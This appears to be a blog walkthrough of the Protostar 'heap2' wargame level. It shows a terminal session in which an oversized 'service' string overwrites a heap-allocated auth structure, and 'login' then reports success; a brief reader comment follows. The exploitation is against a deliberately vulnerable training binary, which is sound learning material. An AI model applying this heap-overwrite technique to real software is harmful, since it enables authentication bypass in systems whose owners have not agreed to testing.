This level examines what can happen when heap pointers are stale. This level is completed when you see the “you have logged in already!” message. (link)
Source Code:
For heap2, our goal is to get the auth->auth integer to be set to a non-zero value.
We can do this by using the "service" command and sending in a oversized service value.
First, let's get addresses for where these objects are allocated:
user@protostar:/opt/protostar/bin$ ./heap2
[ auth = (nil), service = (nil) ]
auth a
[ auth = 0x804c008, service = (nil) ]
service a
[ auth = 0x804c008, service = 0x804c018 ]
Ok, so now if we send a service object of size >= 0x10, it should overwrite the auth object, setting auth->auth to a non-zero value.
user@protostar:/opt/protostar/bin$ ./heap2
[ auth = (nil), service = (nil) ]
auth a
[ auth = 0x804c008, service = (nil) ]
service aaaaaaaaaaaaaaaa
[ auth = 0x804c008, service = 0x804c018 ]
login
you have logged in already!
Success!
Great, Thanks !
ReplyDelete